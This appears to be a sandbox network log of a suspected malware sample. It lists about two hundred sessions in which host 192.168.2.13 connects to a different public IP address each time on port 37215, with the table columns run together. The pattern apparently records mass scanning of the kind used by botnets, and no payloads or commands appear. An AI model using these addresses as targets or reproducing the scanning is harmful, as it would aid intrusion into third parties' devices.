                                                  16896192.168.2.1358450157.175.190.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16897192.168.2.1342342157.31.199.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16898192.168.2.1351278157.170.210.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16899192.168.2.1358382117.29.86.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16900192.168.2.1353410157.193.227.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16901192.168.2.1359282173.216.22.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16902192.168.2.135549841.192.67.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16903192.168.2.134809213.249.13.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16904192.168.2.135741641.73.28.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16905192.168.2.135866841.68.177.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16906192.168.2.1343340157.37.114.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16907192.168.2.135602852.82.23.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16908192.168.2.1335496197.97.110.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16909192.168.2.133636041.20.11.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16910192.168.2.1348194197.203.244.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16911192.168.2.135785441.231.223.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16912192.168.2.1357882197.96.188.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16913192.168.2.1334802197.19.205.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16914192.168.2.1334326157.165.77.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16915192.168.2.1336812197.96.249.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16916192.168.2.1342780157.109.216.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16917192.168.2.135084041.247.125.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16918192.168.2.1341882107.189.245.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16919192.168.2.1346658157.177.41.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16920192.168.2.134251441.92.105.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16921192.168.2.1359174166.38.187.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16922192.168.2.1345708157.132.88.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16923192.168.2.1337826150.71.49.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16924192.168.2.1353210106.168.38.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16925192.168.2.1353074197.183.230.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16926192.168.2.135413286.50.184.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16927192.168.2.1333980197.180.209.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16928192.168.2.135172241.48.95.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16929192.168.2.134262841.119.6.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16930192.168.2.134851441.117.224.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16931192.168.2.1341218157.153.98.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16932192.168.2.133626234.222.2.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16933192.168.2.1352034157.54.213.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16934192.168.2.135442441.31.72.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16935192.168.2.1350846197.177.163.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16936192.168.2.1334364157.174.117.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16937192.168.2.1360660157.183.145.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16938192.168.2.134210041.234.175.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16939192.168.2.135058041.94.163.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16940192.168.2.1359690157.244.164.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16941192.168.2.135378245.69.57.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16942192.168.2.1345364197.108.101.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16943192.168.2.134374841.251.192.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16944192.168.2.1338126157.14.242.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16945192.168.2.1354828197.87.126.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16946192.168.2.134919841.245.188.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16947192.168.2.1352502197.231.123.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16948192.168.2.1338242197.245.157.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16949192.168.2.135754841.43.255.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16950192.168.2.1357822197.154.233.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16951192.168.2.134353441.55.116.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16952192.168.2.1334902157.226.171.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16953192.168.2.1335734197.12.162.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16954192.168.2.134006041.237.126.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16955192.168.2.135663841.105.209.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16956192.168.2.135861841.142.179.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16957192.168.2.133740441.53.184.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16958192.168.2.134278453.86.55.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16959192.168.2.1349114157.140.13.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16960192.168.2.1354000157.26.148.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16961192.168.2.1334438197.117.32.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16962192.168.2.1353804157.46.234.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16963192.168.2.1358352157.240.230.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16964192.168.2.134864269.157.134.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16965192.168.2.1339452157.17.65.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16966192.168.2.1356164157.176.158.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16967192.168.2.1334012157.100.15.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16968192.168.2.134837441.184.218.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16969192.168.2.134013441.183.219.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16970192.168.2.1345534197.238.186.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16971192.168.2.1356616197.201.10.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16972192.168.2.1337506157.237.90.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16973192.168.2.134554441.93.26.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16974192.168.2.1345952103.148.243.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16975192.168.2.1337396197.99.173.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16976192.168.2.1347656219.184.29.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16977192.168.2.133365041.93.205.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16978192.168.2.134849041.37.75.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16979192.168.2.133407045.175.54.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16980192.168.2.1339152110.233.251.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16981192.168.2.134333241.29.53.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16982192.168.2.1342170197.23.87.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16983192.168.2.135383441.42.226.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16984192.168.2.1354826157.121.205.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16985192.168.2.1341644181.75.225.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16986192.168.2.134026841.36.43.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16987192.168.2.1335148112.182.21.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16988192.168.2.1355354197.242.170.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16989192.168.2.1343270179.255.29.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16990192.168.2.1344580197.243.84.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16991192.168.2.133539641.147.221.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16992192.168.2.135999841.171.35.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16993192.168.2.134792441.4.241.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16994192.168.2.135544441.194.13.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16995192.168.2.135965041.26.30.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16996192.168.2.1356892157.27.215.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16997192.168.2.1336822197.14.225.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16998192.168.2.1336816197.206.43.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16999192.168.2.1333350157.36.115.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17000192.168.2.1340186197.46.7.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17001192.168.2.1342436197.16.38.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17002192.168.2.134946495.13.27.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17003192.168.2.1348174157.33.170.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17004192.168.2.1353530197.25.8.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17005192.168.2.1342722197.198.202.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17006192.168.2.1342146173.116.74.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17007192.168.2.1334668197.69.211.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17008192.168.2.135596294.195.12.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17009192.168.2.1348884157.45.162.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17010192.168.2.1352672109.240.117.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17011192.168.2.1333082197.223.113.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17012192.168.2.135603841.135.154.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17013192.168.2.134274441.82.22.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17014192.168.2.1344496197.117.24.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17015192.168.2.1342506196.187.249.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17016192.168.2.133630441.217.73.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17017192.168.2.1352468106.171.230.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17018192.168.2.135756441.232.99.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17019192.168.2.135446058.109.147.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17020192.168.2.1348940197.46.69.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17021192.168.2.1343520197.69.73.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17022192.168.2.1341236197.53.228.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17023192.168.2.135897041.204.151.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17024192.168.2.134158441.62.194.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17025192.168.2.1341942197.170.239.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17026192.168.2.1345950197.13.60.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17027192.168.2.1342670187.187.9.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17028192.168.2.1355140197.227.213.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17029192.168.2.134414664.115.219.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17030192.168.2.133499041.222.99.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17031192.168.2.1360684157.97.142.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17032192.168.2.1348444197.29.23.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17033192.168.2.1349758183.16.72.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17034192.168.2.1349228157.13.150.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17035192.168.2.135970641.5.60.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17036192.168.2.1360324157.63.6.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17037192.168.2.1351470197.40.183.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17038192.168.2.134219241.26.120.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17039192.168.2.135990441.50.45.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17040192.168.2.133478041.26.183.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17041192.168.2.1358738197.48.116.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17042192.168.2.133861042.221.234.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17043192.168.2.1352670157.213.147.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17044192.168.2.1333104157.146.86.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17045192.168.2.134187097.121.118.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17046192.168.2.1348340197.101.41.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17047192.168.2.1343196182.49.131.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17048192.168.2.135647641.142.24.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17049192.168.2.1340018191.247.143.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17050192.168.2.133475041.31.246.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17051192.168.2.135663059.216.126.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17052192.168.2.134497225.67.137.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17053192.168.2.1346186197.248.142.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17054192.168.2.135790241.9.77.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17055192.168.2.1356222157.160.224.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17056192.168.2.133823877.189.192.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17057192.168.2.1353470197.108.195.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17058192.168.2.133916841.157.209.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17059192.168.2.1336542126.125.156.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17060192.168.2.1346940157.27.98.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17061192.168.2.135017041.75.114.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17062192.168.2.1360942157.212.0.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17063192.168.2.1335636197.117.2.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17064192.168.2.1360686157.186.153.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17065192.168.2.1343168197.46.68.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17066192.168.2.134213441.97.22.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17067192.168.2.1355684197.167.203.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17068192.168.2.136018453.199.10.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17069192.168.2.1351558197.127.250.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17070192.168.2.134987641.31.130.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17071192.168.2.1356478197.182.48.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17072192.168.2.1357022157.204.209.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17073192.168.2.133554841.207.234.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17074192.168.2.1341628218.110.3.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17075192.168.2.133524641.125.222.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17076192.168.2.134741690.181.77.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17077192.168.2.134006041.160.1.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17078192.168.2.1341226208.98.151.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17079192.168.2.1358356197.75.62.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17080192.168.2.133996024.240.109.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17081192.168.2.1333208157.3.168.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17082192.168.2.1342192107.174.49.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17083192.168.2.1342184151.145.79.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17084192.168.2.1351856200.183.46.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17085192.168.2.1345154197.160.55.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17086192.168.2.1342196157.247.211.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17087192.168.2.1342402197.139.100.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17088192.168.2.1348838136.220.60.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17089192.168.2.1360282180.59.120.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17090192.168.2.1349702157.210.118.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17091192.168.2.133314841.209.133.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17092192.168.2.1333626197.178.137.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17093192.168.2.134750041.163.18.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17094192.168.2.1339724157.0.7.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17095192.168.2.1353490197.220.154.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17096192.168.2.1338812197.63.113.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17097192.168.2.1345504157.22.204.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17098192.168.2.135802841.237.194.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17099192.168.2.135515841.68.135.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17100192.168.2.134971441.248.64.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17101192.168.2.1349010157.33.149.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17102192.168.2.135103641.154.187.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17103192.168.2.1359298157.8.220.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17104192.168.2.135177841.56.239.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17105192.168.2.1338160157.161.60.10637215
